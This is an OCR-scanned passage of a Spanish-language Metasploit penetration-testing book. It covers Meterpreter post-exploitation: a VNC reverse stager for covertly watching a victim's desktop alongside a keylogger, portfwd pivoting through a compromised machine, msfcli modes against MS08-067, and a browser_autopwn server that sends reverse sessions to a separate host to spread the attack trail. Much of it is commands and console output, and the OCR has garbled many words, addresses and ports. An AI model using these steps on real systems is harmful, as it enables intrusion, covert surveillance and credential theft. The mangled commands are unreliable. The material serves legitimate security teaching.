(*3  Cresting  a  VNC  reverse  tep  stager:  LH0ST=192 . 163 . 1 . 40  LP0RT=4545) 

[*]  Running  payload  handler 
• H)  VNC  stager  executable  73802  bytes  long 

1*1  Uploaded  the  VNC  agent  to  C:\WINDOWS\TEMP\TNpWqQZiiVTcz.exe  {must  be  deleted  manually) 

!*]  Executing  the  VNC  agent  with  endpoint  192.168.1.40:4545... 

roeterpreter  >  Connected  to  RFB  server,  using  protocol  version  3.8 

Enabling  TightVNC  protocol  extensions 

No  authentication  needed 

Authentication  successful  ' 

Desktop  name  Mpruebas-01760cc" 

VNC  server  default  format: 

32  bits  per  pixel. 

Least  significant  byte  first  in  each  pixel. 

True  colour:  max  red  255  green  255  blue  255,  shift  red  16  green  8  blue  0 

Fig  4.86:  Oblcncion  de  la  vision  de  un  escrilorio  remolo  con  VNC  en  la  sesion  de  la  victima. 


Otra  option  posible  es  la  utilizacion  del  script  de  Meterpreter  vne .  Con  este  script  se  ejecuta  un 
ngente  con  el  que  se  puede  realizar  la  conexion,  y  obtener  la  vision  del  escritorio.  de  la  victima.  Hay 
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que  tener  cuidado  con  la  posibilidad  de  no  mover  el  raton  al  usuario,  ya  que  podria  darse  cuenia. 
Se  recomienda,  simplemente  visualizar  las  aeciones  de  este,  a  la  vez,  que  por  ejempio,  se  utiliza  un 
keylogger  para  capturar  credenciales  no  visibles. 

PoC:  Port  forwarding 

En  esla  prueba  de  concepto  se  presenta  el  concepto  de  pur  (forwarding  con  el  que  un  alacante  podra 
ulilizar  una  maquina  vuinerada  como  cebo  O' maquina  que  realizara  las  peliciones  por  ei.  En  olras 
palabras,  se  propone  ei  siguienle  escenario: 

-  El  alacante  utiliza  un  sistema  operativo  con  Metasploit ,  por  ejempio  IkickTrack  5. 

-  La  maquina  vuinerada  con  un  sislema  operativo,  per  ejempio,  Window  XP. 

-  La  maquina  objetivo.  En  esta  maquina  se  quiere  obtener  aceeso  o  realizar  un  ataque.  EsLa 
maquina  recibira  las  peliciones  como  si  viniesen  de  la  maquina  vuinerada,  en  vez  de  proven ir 
del  alacante. 

Para  realizar  esta  tecnica  se  utiliza  el  comando  portfwd,  el  cual  dispone  de  varios  parametros 
interesanles: 

-  El  parametro  -L  indica  el  host  local  donde  comenzara  la  redireccion  de  paquetes.  Este 
parametro  es  optional,  por  defecto  se  configure  con  la  direction  IP  de  la  maquina  vuinerada, 

-  El  parametro  -r  indica  ei  host  remoto  al  que  se  reenviaran  los  paquetes,  es  la  direccion  IP 
de  la  maquina  objetivo. 

-  El  parametro  -1  indica  el  puerto  local  donde  se  recibiran  las  conexiones.  Este  puerto 
pertenece  a  la  maquina  vuinerada. 

-  El  parametro  -p  indica  el  puerto  de  la  maquina  rernota,  es  deck  la  espccificada  en  el 
parametro  nr,  a  la  que  se  realizaran  los  reenvlos.  . 

A  continuation  se  presenta  un  sencillo  ejempio  donde  las  peticiones  que  el  alacante  quiere  realizar  a 
una  maquina  objetivo,  se  realizan  a  traves  de  una  maquina  vuinerada.  La  maquina  objetivo  recibira 
las  peticiones  como  si  reaimente  fueran  originadas  por  la  maquina  vuinerada. 

El  escenario  arranca  con  una  sesion  de  Meterpreter  del  atacante  sobre  la  maquina  vuinerada.  La 
configuration  del  comando  portfwd  es  sencilla  tal  y  como  se  puede  visualizar  en  la  imagen  de  la 
pagina  siguiente. 

Tras  la  ejecucion  del  comando,  la  maquina  atacante  enviara  el  trafico  a  su  interfaz  local  donde  tienc 
iin  listener  en  un  puerto  concreto  encargado  de  redirigir  el  trafico  a  Meterpreter  en  la  maquina 
vuinerada.  Esta  maquina  vuinerada  recibe  la  petition  y  la  reenvia  hacia  la  maquina  objetivo.  La 
configuration  del  comando  es  sencilla  y  para  poder  visualizar  las  ordenes  ereadas  en  portfwd  se 
puede  ejecutar  solo  el  comando  para  obtener  ei  lislado. 


Capttulo  IV.  Meterpreter  c£  Post-Explotation 


Usage:  portfwd 


Lush J  [args] 


-L  <opt>  The  local  host  to  listen  on  (optional) . 

-h  Help  banner. 

-I  «opt>  The  local  port  to  listen  on. 

-p  <opt>  The  remote  port  to  connect  to.  ' 

-r  <opt>  The  remote  host  to  connect  to. 

»eterpreter>  portfwd  add  -l  9690  -p  B9  -r  192.169.0.63 

!a)  Local  TCP  relay  created:  6.0.0.0:9090  <->  192,168.0.63:86 

aeterpreter  >  background 

(*]  Sackg rounding  session  1.., 

as f  exploit (fns88_667jietapi)  >  ifeonfig  |  grep  inet 

i*]  cxec:  ifeonfig  |  grep  inet 

_ inet  addr:192. 168. 6.61  Beast; 192 .168, 0, 255  Mask: 255. 255 .255 .9 

l-  ig  4.87:  Redireccion  de  paquetes  a  traves  del  comando  portfwd 


Ahora,  el  alacante  abre  ei  navegador  web  y  escribe  la  direccion  http: //1 2 7. 0. 0. 1 : 9000,  £Por  que  el 
puerto  9000?  Es  donde  se  ha  configurado  el  listener  en  la  configuracion  de  portfwd.  La  respucsta 
que  se  obtiene  es  “It  Works  que  es  el  fichero  por  delecto  de  un  servidor  Apache. 


Fig  4.88:  Petition  hup  a  traves  de  una  maquina  vuinerada. 

^Reaimente  es  la  maquina  vuinerada  quien  realiza  la  petition  encubriendo  a  la  maquina  del  alacante? 
La  respuesta  es  si,  en  la  maquina  del  objetivo  se  abre  la  apljcacion  Wireshark  para  visualizar  el 
trafico  que  llega  por  su  interfaz  de  red.  Las  maquinas  del  escenario  tienen  las  siguienles  direceiones 
IP: 

-  La  maquina  del  atacante  tiene  la  direccion  IP  192. 1 68.0.6 1 . 

-  La  maquina  vuinerada  tiene  la  direction  IP  192. 1 68.0.62. 

-  La  maquina  objetivo  tiene  la  direction  IP  1 92. 1 68.0,63. 


En  la  imagen  siguienle  se  puede  visualizar  como  la  petition  HTTP  llega  a  traves  de  la  maquina  con 
direccion  IP  192.168.0.62,  que  es  la  vuinerada.  Esta  tecnica  puede  dar  lugar  a  otro  gran  uumeio  tie 
posibilidadcs. 
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16]  5 .4965020661192.168;  0 3Q4 
tJ  Frame  14:  ittiT  bytes  on  wire 

M  Ethernet  II,  Src:  CadmusCo_b7 i f 2 ! 08  ’(68 * 80 *27? b7 s'f 5 i Ofi ) V*Dst j  Cadimi5C9_0&:5ci43  (08100:2" 
ti  Internet  Protocol  Version1  ■  •192^168 - 0 .’,031  ( 192 i'16* 

i; !  ^  ^  -( );V!;=':Setj  tij'-l’f ' 

Host:  127.G.0. l:9000\r\n  ’"  . 

User- Agent:  Mozilla/5,9  (Xll;  Linux  i686  on  x86_64;  rv:2.0.1)  Gecko/20100101  Firefox/4 
_ Accept:  text/html , application/xhtml+xnil , application/xml ; q=0 . 9 , */* ; q=0 . 8\ t \n 

i’ig  4.89:  Capture  c!e  Wireshark  ilonde  se  visual  iza  el  origen  tie  la  petici6n. 


lay  que  tener  en  cuenta,  como  se  puede  visualizar  en  la  imagen,  que  c!  User-Agent  puede  delatar  a 
i  maquina  origen,  por  !o  que  puede  ser  interesante  cambiar  dicha  informacion. 


1.  msf  tools 

En  rnultitud  de  ocasiones  se  lia  comentado  que  Metasploit  es  un  framework  o  conjunto  de 
herramientas  que  proporcionan  distintas  funcionaiidades  al  auditor.  En  este  capltulo  se  pueden 
estudiar  y  realizar  pruebas  con  las  mas  utilizadas  o  reconocidas  a  nivel  mundial  en  el  ambito  de  la 
intrusion  o pentesting.  Como  curiosidad  indicar  que  todas  las  herramientas  comienzan  por  las  siglas 
msf  (  Metasploil  framework)  seguidas  de  un  nombre  indicative  de  la  action  que  realizan, 

A  menudo  nuichos  de  los  pentesters  o  auditores  de  seguridad  se  pueden  encontrar  con  earn  bios  en  las 
herramientas  dispombles  en  d  framework  de  Metasploit.  Este  hecho  es  debido  a  que  se  desarrollan 
nuevas  versiones  o  nuevas  aplicaciones  que  pasan  a  format  parte  del  framework.  Es  sencillo 
eneontrarse  que  en  nuevas  versiones  de  Metasploit  aparezean  nuevas  aplicaciones  que  proporcionan 
novedosas  funcionaiidades  o,  inciuso,  optimizan  funciones  existentes  de  varias  herramientas,  como 
por  ejemplo  msfvenom ,  ia  cua!  fuslona  la  funcionalidad  de  msfpayloady  de  msfencode. 

En  anteriores  capitulos  se  han  estudiado  herramientas  que  proporcionan  y  facilitan  el  uso  del 
framework ,  ya  sea  mediante  el  uso  de  ima  llnea  de  comandos,  msfconsole ,  o  medianie  el  uso  de 
tma  interfaz  grafica,  por  ejemplo  armitage.  Pero,  como  se  ha  mencionado,  existen  otro  tipo  de 
herramientas  con  olras  funcionaiidades,  corno  por  ejemplo  la  creation  de  ejecutabies  que  alberguen 
en  su  interior  eodigo  ej  ecu  table  o  shellcode  con  fines  maliciosos.  Por  otro  lado,  tarabien  se  puede 
ayudar  a  los  exploiters  a  obtener payloads  sin  necesidad  de  crearlos  ellos  mismos. 

Otro  tipo  de  aplicaciones  muy  utilizado  son  las  que  ayudan  a  evadir  los  sistemas  de  defensa  de 
una  maquina,  conic  por  ejemplo  los  antivirus.  La  mayorla  de  los  payloads  que  son  iitilizados  por 
Metasploit  pueden  ser  detectados  por  una  gran  parte  de  los  antivirus,  por  elto  es  necesario  utilizar 
herramientas  que  ofusquen  el  eodigo  del  payload  pam  evitar  su  detection. 

Existen  herramientas  en  el  framework  cuya  fmalidad  es  la  manipulacion  de  la  memoria  y  analisis  de 
esta.  Este  tipo  de  herramientas  ayudan  at  exploiter  a  encontrar  instrucciones  en  lenguaje  ensamblador 
clave  para  el  desarrolio  del  exploit. 

La  gestion  remota  tambien  se  encuentra  disponible  en  Metasploit  gracias  a  herramientas  como  msfd, 
ia  cual  proporciona  un  servicio  o  daemon  con  el  que  se  puede  manipular  el  framework  remotamente. 
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Por  ultimo  mencionar  que  Metasploit  sigue  creciendo  y  aumentando  en  funcionalidades  e  integracion 
con  otros  sistemas  y  apiicaciones  de  seguridad.  £sle  hecho  hace  que  ei  framework  disponga  de  una 
riqueza  inipllcita  real  men  te  interesante  para  su  utilizacidn  en  el  dta  a  dia  del  auditor.  Las  msf  tools 
siguen  apareciendo  y  anadiendose  al  framework  lo  que  proporciona  un  hecho  nvuy  interesante  corno 
se  menciono  anteriomiente. 

rootgruot : /pentsst/exploits/ f ramework3#  Is 

armitage  HACKING  rasf console  msfgui  msfpescan  plugins  tools 

data  lib  fflsfd  msfmachscan  msfrpc  README 

documentation  modules  msfelfscan  msfopcode  msfrpcd  scripts 

external  ns  fell  msfencode  tnsfpayload  insfupdate  test 

rQot§root:/pentest/exploits/framework3# _ 

Fig  5.01:  Msf  tools  disponibles  en  BackTrack  5. 


2.  Msfcli:  EI  poder  de  la  linea 

Esta  herramienta  es  una  de  las  cuatro  opciones  que  dispone  la  arquitectura  de  Metasploit  para 
interactuar  con  el  framework.  Es  deeir,  es  una  de  las  cuatro  interfaces  que  existen  para  ejecutar 
instrueciones  y  realizar  distintas  fases  de  un  test  de  intrusion. 

Esta  aplicacion  pennite  ejecutar  modulos  de  tipo  exploit  o  auxiliary  directainente  desde  una  linea  de 
comandos.  De  este  rnodo,  se  evita  tener  que  cargar  todas  las  estrucluras  necesarias  cuando  se  ejecuta 
la  aplicacion  msfconsole.  Se  puede  entender  como  que  cuando  se  arranca  msfconsole  se  cargan  en 
memoria  las  estrueturas  necesarias  para  el  correcto  funcionamiento  de  Metasploit,  mientras  que 
arrancando  msfcli  se  carga  solamente  un  modulo  por  lo  que  se  ejecutara  la  accion  de  maiiera  mas 
rapida. 

Hay  que  tener  en  cuenta  que  en  el  momenta  de  lanzar  un  modulo  con  msfcli  se  deben  indicar  todas 
las  opciones  necesarias  para  la  correcta  ejecucion  del  modulo.  Por  ejemplo,  si  se  va  a  proceder  a 
lanzar  un  exploit  con  esta  herramienta  se  debera  indicar,  generalmente,  ei  equipo  remoto  sobre  el 
que  se  lanzara  dicho  exploit  o  la  direction  IP  sobre  la  que  se  implementa  cl  servidor  para  ios  alaques 
de  tipo  Client-Side  Attack.  Se  debe  indicar  que  tipo  de  payloads  se  utilizan  si  es  un  modulo  de  tipo 
exploit. 

La  sintaxis  de  la  herramienta  es  msfcli  <rula  modulo>  [PAYLOAD=<ruta payload>  LHOST/RHOST 
LPORT/RPORT]  <modo>.  Los  distintos  rnodos  proporcionan  gran  flexibilidad  a  la  herramienta  ya 
que  indican  que  accion  se  realizara. 

Hay  que  tener  en  cuenta  que  cuando  se  utiliza  la  herramienta  msfcli  todos  los  parametros  son 
asignados  mediante  el  uso  del  operador  ‘ En  msfconsole  se  indica  ei  parametro  y  a  continuacion 
se  asigna  e!  valor.  Ademas,  msfcli  es  case  sensitive,  detalle  que  hay  que  tener  en  cuenta  para  el 
correcto  funcionamiento  de  la  aplicacion. 


Capitnlo  V.  Otras  msf  too  ls 


Modos  de  msfcli 

Los  modos  de  ejecucion  de  msfcli  indican  que  accion  realizara  la  aplicacion.  En  la  imagen  se  observan 
los  distintos  modes  de  ejecucion  que  dispone  la  herramienta.  Hay  que  considerar  que  las  opciones 
son  equivalenles  a  los  parametros  o  variables,  como  por  ejemplo*  RHOST,  LHOST,  etcetera. 

lisage:  /opt/framework3/fflsf3/flisfcli  <exploit  name>  <opliofi=value>  f 

Mode  Description 

(H) elp  You're  looking  at  it  baby!  . 

(Sjuntmary  Show  information  about  this  module 

(a)ptions  Show  available  options  for  this  module 

{Advanced  Show  available  advanced  options  for  this  module 

(I) OS  Evasion  Show  available  ids  evasion  options  for  this  module 

(P)ayloacis  Show  available  payloads  for  this  module 

(T) argots  Show  available  targets  for  this  exploit  module 

(AC)tions  Show  available  actions  for  this  auxiliary  module 

I  (Cjheck  Run  the  check  routine  of  the  selected  module 

{EJxecute  Execute  the  selected  module 

Fig  5.02:  Modos  de  ejecucion  de  msfcli. 

El  primero  de  los  modos  que  se  presenta  es  uno  de  los  mas  importantes  y  es  el  mode  H.  Este  mode 
proporcil>na  ayuda  e  information  sobre  la  aplicacion.  Si  se  ejecuta  la  siguienie  instruction  msfcli 
<exploit>  H,  se  obtiene  ayuda  sobre  la  aplicacion  msfcli. 


root@root :  /pentest/exploits/f rameworkM  msfcli  exploit/niulti/handler  5 
[*]  Please  wait  while  we  load  the  module  tree... 


Name:  Generic  Payload  Handler 
Module:  exploit/multi/handler 
Version:  11845 

Platform:  Windows,  Linux,  Solaris,  Unix,  OSX,  BSD,  PHP,  lava 
Privileged:  No 

License:  Metasploit  Framework  License  (BSD) 

Rank:  Manual 

Provided  by: 

hdm  <hdm@metasploit . com> 

Available  targets: 

Id  Name 

0  Wildcard  Target 

Payload  information: 

Space:  16000000 
Avoid:  8  characters 


Description: 

This  module  is  a  stub  that  provides  ail  of  the  features  of  the 
Metasploit  payload  system  to  exploits  that  have  been  launched 
outside  of  the  framework. 


Fig  5.03:  Ejecucion  msfcli  en  modo  summary. 
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Bxiste  e!  inodo  resumen  o  summary,  que  es  indicado  mediante  la  letra  S,  el  cuai  proporeiona 
inlortnacibn  sobre  tin  modulo  en  eoncreto  que  se  requiem  utilizar.  La  s  intax  is  es  realmente  sencilla, 
un  ejemplo  se  ptiede  visualizar  en  ia  imagen  anterior. 

El  inodo  0  u  opciones  muestra  information  sobre  las  variables  que  se  pueden  conftgurar  sobre  un 
modulo  eoncreto.  En  el  ejemplo  se  ha  utilizado  el  modulo  exploit/windows/smb/psexec  y  se  obtienen 
las  distintas  variables  que  pueden  ser  configuradas.  Este  modo  es  el  equivalente  a  show  options  en 
una  sesion  do  msfconsole. 


rooi@ruot:  /peivtest /exploits /frameworks#  msfcli  exploit/windows/smb/psexec  G 
!+]  Please  wait  while  we  load  the  module  tree... 


Name 

Current  Setting 

Required 

Description 

RHGST 

yes 

The  target  address 

RPOlir 

445 

yes 

Set  the  SMB  service  port 

SHARE 

AOMIN $ 

yes 

The  share  to  connect  to,  can  be  ar:  admin  share 

(ADMIN$,C$. . 

. . )  ora  normal 

read/write  folder  share  j 

SM13D  amain 

WORKGROUP 

no 

The  Windows  domain  to  use  for  authentication 

SMSPass 

no 

The  password  for  the  specified  username 

SHBUscr 

no 

The  username  to  authenticate  as 

Pig  5.04:  Ejecucion  msfcli  en  modo  options. 


Los  modos  A  e  1  son  especiales,  el  primero  muestra  information  sobre  las  variables  avanzadas  que 
pueden  ser  configuradas  en  un  modulo  eoncreto.  El  segundo  es  un  modo  muy  interesante.  ya  que 
proporeiona  infonnacibn  sobre  opciones  para  la  evasion  de  IDS  en  easo  de  que  el  modulo  con  el  que 
sc  este  trabajando  disponga  de  esta  opcion. 

E!  modo  P  proporeiona  infonnacibn  sobre  los  payloads  disponibles  para  un  modulo  de  exploit 
o  auxiliary  en  eoncreto.  Esta  opcion  es  realmente  util  y  proporeiona  infonnacibn  muy  valida  y 
reeoinendada  de  visualizar  antes  de  lanzar  el  modulo.  Este  modo  es  equivalente  a  la  instruccibu 
show  payloads  cuando  se  encuentra  un  modulo  eoncreto  cargado  en  una  sesion  de  msfconsole. 


rootflrovt : /jien test/exploi ts/f ramework3#  msfcli  exploit/windows/smb/psexec  P 

i*j  Please  wait:  while  we  load  the  module  tree... 

Compatible  payloads 

. 

Name 

Description 

generie/debugtrap 
generic/she ll  bind  tep 

Generate  a  debug  trap  in  the  target  process 
Listen  for  a  connection  and  spawn  a  command  s 

lell 

generic/shell  reverse  tep 
shell 

Connect  back  to  attacker  and  spawn  a  command 

generic/tightloop 

Generate  a  tight  loop  in  the  target  process 

windows/adduser 
istration  group 

Create  a  new  user  and  add  them  to  local  admin 

windows/dllinject/bind  ipv6  tep 

Listen  for  a  connection  over  IPv6,  Inject  a  D 

ll  via  a  reflective  loader 

windows/dllinject/binrijionxtcp 
via  a  reflective  loader 

Listen  for  a  connection  (No  NX),  Inject  a  Dll 

windows/dUinject/bind_tcp 
eflective  loader 

Listen  for  a  connection,  Inject  a  Dll  via  a  r 

Fig  5.05:  Ejecucion  msfcli  en  modo  payloads. 


El  modo  targets  o  T  proporeiona  informacibn  sobre  los  sistemas  operatives  vulnerables  antes 
ejecutar  un  exploit  concrete.  En  la  imagen  se  pueden  visualizar  un  gran  numero  de  targets  para  e] 
exploit  ms08J)67  jietapi,  el  cuai  ha  sido  estudiado  en  el  presente  libro.  Realmente  el  numero 
targets  para  los  que  esta  disponible  este  exploit  son  62  versiones  distintas  de  Windows,  con  clistintos 
idiomas,  en  versiones  XP,  2003,  2000,  etcetera.  Este  modo  es  equivalente  a.  la  instruction  40h 
targets  cuando  se  encuentra  un  modulo  cargado  en  msfconsole. 


rootiaroflii/pentest/exploLts/frflffletfork.l#  msfcli  explolt/windoWs/smb/ros0B  067_netapi  T 
[*)  clease  wait  while  we  load  the  module  tree.,. 

Id  Maine 

a  Automatic  Targeting 

1  Windows  2660  Universal 

2  Windows  XP  SP8/SP1  Universal 

3  Windows  XP  SP2  English  (NX) 

4  Windows  XP  SP3  English  (NX) 

5  Windows  2063  SP8  Universal 

6  Windows  2603  SP1  English  (MO  NX) 

I  Windows  2083  SP-l  English  (NX) 

8  Windows  2603  SP1  Japanese  (NO  MX) 

3  Windows  2303  SP2  English  (NO  MX) 

10  Windows  2603  5P2  English  (NX) 

II  Windows  2063  SP2  German  (NO  NX) 

12  Windows  2663  SP2  German  (NX) 

13  Windows  XP  SP2  Arabic  (NX) 

14  Windows  XP  SP2  Chinese  -  Traditional  /  Taiwan  (NX) 

15  Windows  XP  SP2  Chinese  -  Simplified  (NX) 

16  Windows  XP  SP2  Chinese  -  Traditional  (NX) 

17  Windows  XP  SP2  Czech  (NX) 

18  Windows  XP  SP2  Danish  (NX) 

19  Windows  XP  5P2  German  (NX) 

26  Windows  XP  5P2  Greek  (MX) 

21  Windows  XP  SP2  Spanish  (NX) 

22  Windows  XP  SP2  Finnish  (NX) _ 

Fig  5.06:  Ejecucion  msfcli  en  modo  targets. 

El  modo  AC  o  actions  proporeiona  informacibn  sobre  acciones  que  pueden  realizar  los  modulos  qe 
tipo  auxiliary.  For  otro  tado  se  encuentra  ei  modo  C  o  check  que  equivale  a  la  instruceion  check  en 
una  sesion  de  msfconsole.  En  la  imagen  se  puede  visualizar  como  configurando  la  variable  RHOST 
indicando  el  modo  C  y  especitlcarido  el  exploit  se  compmeba  si  el  objetivo  es  vulnerable  o  no. 


root@root: -#  msfcli  exptoit/windows/smb/ms0B_067_netapi  RH05T=192. 166.1,38  C 
l*j  Please  wait  while  we  load  the  module  tree... 

(*j  Verifying  vulnerable  status...  (path:  0x60000053) 

[+]  The  target  is  vulnerable. 

rootgroat:-#  | _ 

Fig  5.07:  Ejecucion  msfcli  en  modo  check. 

El  modo  E  o  ejecucion,  es  quiza  el  modo  mas  conocido  por  los  auditores.  Con  clicbo  modo  se  lanza 
el  modulo,  ya  sea  auxiliary  o  exploit.  Es  necesario,  indicar  las  variables  requeridas  en  el  momento 
de  lanzar  este  modo  en  la  aplicacion  msfcli. 


Beneficios  del  uso  de  msfcli 

Los  beneficios  de  la  util izacion  de  este  tipo  de  interfaz  son  varies.  Uno  de  los  mayores  usos  y 
beneficios  que  proporeiona  msfcli  es  la  posibilidad  de  implementar  servidores  de  conexiones  0 
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sesiones.  De  este  raodo  el  auditor  puede  lanzar  la  etapa  de  explotacion  y  recibir  las  conexiones  en 
cualquier  otra  m&quina  eonfigurada  para  ello  median  te  el  uso  de  msfcli.  Ademas,  se  pueden  resumir 
los  beneficios  de  la  utilizacion  de  msfcli  con  las  sentehcias  que  se  muestmn  a  continuation: 

-  Soporte  para  el  lanzamiento  y  aprovecbaniiento  de  los  modulos  de  tipo  exploit  y  auxiliary. 
Este  tipo  de  modulos  son  los  mas  funcionales  que  proporciona  el  framework,  ademas  de  los 
mas  utilizados  en  el  proceso  de  un  test  de  intrusion. 

-  Uso  para  tareas  especificas  en  el  test  de  intrusion.  Generalmente,  se  utilize  msfcli  para 
lanzar  un  exploit  concreto  o  implementar  un  servidor  de  sesiones  remotas  sobre  las  maquinas 
vulneradas.  Exisle  un  debate  sobre  si  esto  ultimo  es  un  bene  lie  io  o  no,  ya  que  se  puede 
enlender  como  una  razon  restrietiva. 

-  Esta  herramienta  es  util  para  el  aprendizaje  y  la  comprension  de  la  arquitectura  riel 
framework. 

-  Es  conveniente  usarla  etiando  se  desarrolla  algun  nuevo  exploit  y  se  pretende  utilizar 
en  un  test  de  intrusion.  De  este  motlo  se  mantiene  un  control  sobre  la  operativa  que  se  esta 
llevando  a  cabo  en  el  proceso  de  la  auditoria. 

-  Es  una  buena  herramienta  para  realizar  pruebas  por  el  auditor.  Este  tipo  de  pruebas  son 
denominadas  ojf-exploilation.  Estas  pruebas  serian  las  equivalents;  a  montar  un  entorno  de 
p  reproduction. 

-  La  aplicacidn  es  bastante  util  si  el  auditor  conoce  realmenle  que  exploit  quiere  utilizar  o 
que  tipo  de  tecnica  se  utiliza  en  la  fase  de  explotacion, 

Teona  de  conexiones 

Cuando  un  exploit  es  ianzado  contra  una  maquina  objetivo  se  busca  obtener  una  sesion  que 
proporcione  el  control  del  equipo  remoto.  Estas  sesiones  pueden  ser  dircctas  o  inverses,  las  cuales 
trabajan  de  manera  similar  a  como  lo  hacen  los  troyanos  en  sus  conexiones. 

El  uso  de  sesiones  inverses  puede  ayudar  ai  auditor  o  atacante  a  evitar  los  firewalls  implicitos 
que  llevan  los  router.  Hay  que  recordar  que  todos  los  exploits  que  uliiizan  el  metodo  de  conexion 
inversa  utilizan  impllcitamente  el  modulo  llamado  exploit/ multi/handler,  el  cual  recibira  la  sesion 
inversa  sobre  la  maquina  remota.  Este  modulo  proporciona  una  gran  cantidad  de  oportunidades  a  los 
auditores  o  alacantes,  los  cuales  se  presentan  en  este  apartado. 

En  gran  parte  de  la  documentation  que  se  puede  leer  sobre  Metasploit  se  presenta  la  maquina 
que  lanza  los  exploits  o  el  servidor  que  utiliza  la  tecnica  Client-Side  Attack  como  la  maquina  que 
gestionara  y  aproveehara  las  sesiones  obtenidas  sobre  los  equipos  vulnerados.  Este  hecho  no  tiene 
porque  ser  asi,  ya  que  se  puede  utilizar  un  servidor  o  maquina  para  provocar  la  obtencion  de  sesiones 
en  la  fase  de  explotacion  y  que  dichas  sesiones  se  gestionen  sobre  otras  maquinas. 

^Cbmo  se  realiza  dicha  accion?  El  concepto  es  realmente  sencillo,  cuando  se  configura  un  exploit 
se  puede  elegir  el  payload  que  se  ejecutara  en  la  maquina  remota,  en  caso  de  que  la  explotacion 


tenga  exito.  El  payload  de  tipo  inverso  debe  ser  configurado  con  una  direccidn  IP  en  la  cual  una  vez 
ejecutado  en  la  maquina  vlctima,  se  conectara  para  otorgar  el  control  de  dicha  maquina. 

En  la  imagen  se  puede  observer  como  el  atacante  real  se  encuenlra  en  una  red  privada,  como  puede 
ser  la  de  cualquier  empresa  o  casa.  Por  otro  lado,  se  visualiza  una  maquina  victima  que  s imu la 
encontrarse  en  la  red  de  una  empresa.  El  atacante  dispone  de  un  servidor,  por  ejempio  web,  que 
utilizando  la  vccnica  Client-Side  Attack  espera  a  recibir  peticiones  de  victimas  potenciales.  En 
el  momento  cn  que  la  victima  es  vuinerada,  el  payload  que  se  ejecula  en  ella  data  e!  control  de 
la  maquinfi  al  equipo  del  atacante  y  no  al  servidor  web.  De  este  modo  se  consigue  que  ei  rastro 
de  la  explotacion  quede  distribuido,  ya  que  una  maquina  se  encarga  de  la  larea,  posiblemente 
automatizada,  de  explotacion,  mien  Iras  que  la  gestion  de  la  sesion  remota,  que  es  realmente  lo  que 
interesa,  sc  realiza  desde  otra  red  totaimente  distinta. 


Fig  5.08:  Escjuema  basico  de  la  fase  de  explotacion. 


Esta  explotacion  y  gestion  distribuida  puede  ir  un  paso  mas  alia,  ya  que  se  podria  conftgurar  en 
el  servidor,  el  cual  esta  disponible  en  internet,  distintos  exploits  con  distintos  payloads  los  cuales 
podrian  apunlar  a  distintas  direcciones  IP.  De  nuevo,  ei  rastro  se  distribuye  entre  dislintas  maquinas, 
y  aunque  tanipoco  seria  demasiado  complejo  realizar  un  rastreo  a  priori,  se  podrian  ocultar  las 
conexiones  a  traves  de  maquinas  vulneradas  que  hicieran  de  puente.  Estas  conexiones  se  pueden 
distribuir  e  inlentar  ocultar  de  diversas  maneras,  en  este  aspecto  entra  en  juego  la  imaginacion  del 
atacante  o  auditor. 


PoC:  Servidor  de  exploits  y  maquina  privada  para  las  sesiones 

Bn  la  siguiente  prueba  de  concepto  se  prepararA  un  servidor  con  el  modulo  auxiliary  para  realizar 
un  auiopwn  browser.  Cuando  las  vlctimas  se  conecten  al  servidor  web  se  lanzaran  exploits  contra  ia 
maquina  que  origina  la  conexion.  Como  maquina  victima  en  la  prueba  de  concepto  se  ha  utitizado 
un  equipo  con  sistema  operative  Windows  X P  SP3  con  los.  navegadores  Mozilla  Firefox  e  Internet 
Explorer. 

Bn  el  servidor  se  configurara  un  payload  de  tipo  Meterpreter  con  conexion  inversa  y  ademas  se 
indicara  la  direccion  IP  donde  se  encuentra  la  maquina  que  gestionara  o  recibira  las  sesiones  de 
Meterpreter.  La  maquina  que  recibira  las  sesiones  inversas  sera  configurada  con  la  aplicacion  msfcli 
y  el  modulo  exploit/multi/handler,  cuya  configuracion  se  estudiara  mas  adelante. 

Bn  la  imagen  se  puede  visualizar  la  configuracion  del  modulo  auxiliary/seiyer/browserjmtopwn  y 
ia  asignacion  de  los  va lores  a  las  variables  que  dispone  el  modulo.  May  que  destacar  que  el  servidor 
web  se  configure  con  URTPATH  en  la  raiz,  es  decircon  La  variable  PAYLOAD_WIN32  indica 
que  payload  se  utiiizara  para  sistemas  operativos  Windows,  en  este  caso  solo  se  puede  asignar 
el  payload  windows/meterpreier/reversejcp.  El  puerto  donde  el  servidor  web  se  mantendra  a  la 
escueha  de  peti clones  sera  el  80,  configurado  manualmente,  ya  que  por  defecto  seria  el  8080.  La 
variable  LHOST  indica  en  que  direccion  TP  o  nombre  de  dominio  se  configurara  la  maquina  que 
gestionara  o  recibira  las  sesiones  inversas. 


nsf  >  use  auxiliary/server/browser  autopwn 
nsf  auxiliary (browser_autopwn)  >  show  options 

•lodule  options  (auxiliary/server/browsrir_Butopwn)  r 

Name  Current  Setting  Required  Description 


LHOST 

SRVH0ST  0 ,9.9.0 
the  local  machine  or  0.0. 0.0 
SRVP0RT  0080 
SSI.  false 

SSLVers.lon  SSL3 
d:  SSL2 ,  SSL3 ,  TLS1) 

URiPATH 


The  Tp  address  to  use  for  reverse- connect  payloads 
The  local  host  to  listen  on.  This  must  be  an  address  on 

The  local  port  to  listen  on. 

Negotiate  SSL  for  incoming  connections 

Specify  the  version  of  SSL  that  should  be  used  (accepte 

The  URI  to  use  for  this  exploit  {defauli:  is  random) 


nsf  auxiliary(browserjiutopwn)  >  set  LHOST  192.168.1.39 
LIIOST  =>  1D2.168.1.39~ 

ns f  auxiUary(browserautopwn)  >  set  PAYL0ADWIN32  windows/ineterpreter/reverse_tcp 
F>AYL0Ai)_WIN32  =>  windows/roeterpreter/reversetcp 
nsf  auxiliary(hrowser  autopwn)  >  set  SRVPORT  80 
5RVP0RT  =>80 

nsf  auxiliarydirowserautopwn)  >  set  URIPATH  / 

JRIPATH  =>  / 

nsf  auxiliaryfhrowserautopwn)  >  run| 

Fig  5.09:  Configuracion  del  servidor  con  el  mddulo  browser  auiopwn. 


(Jna  vez  configurado  el  servidor  web  a  traves  del  modulo  browser  auiopwn  se  debe  configurer  en 
la  otra  maquina  que  gestiona  el  atacante  o  el  auditor  el  modulo  exploit/multi/handler.  Mediante  !a 
aplicacion  msfcli  se  configurara  dicho  modulo  para  comprobar  la  utilidad  de  clicha  herramienta. 
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La  configuracion  es  realmente  sencilla,  se  debe  indicar  el  tipo  de  payload  e I  oral  se  puede  inyectar 
en  este  caso  Meterpreter,  tambidn  se  debe  indicar  la  direccidn  IP  local  de  la  maquina  y  el  puertd 


donde  se  escuchara. 


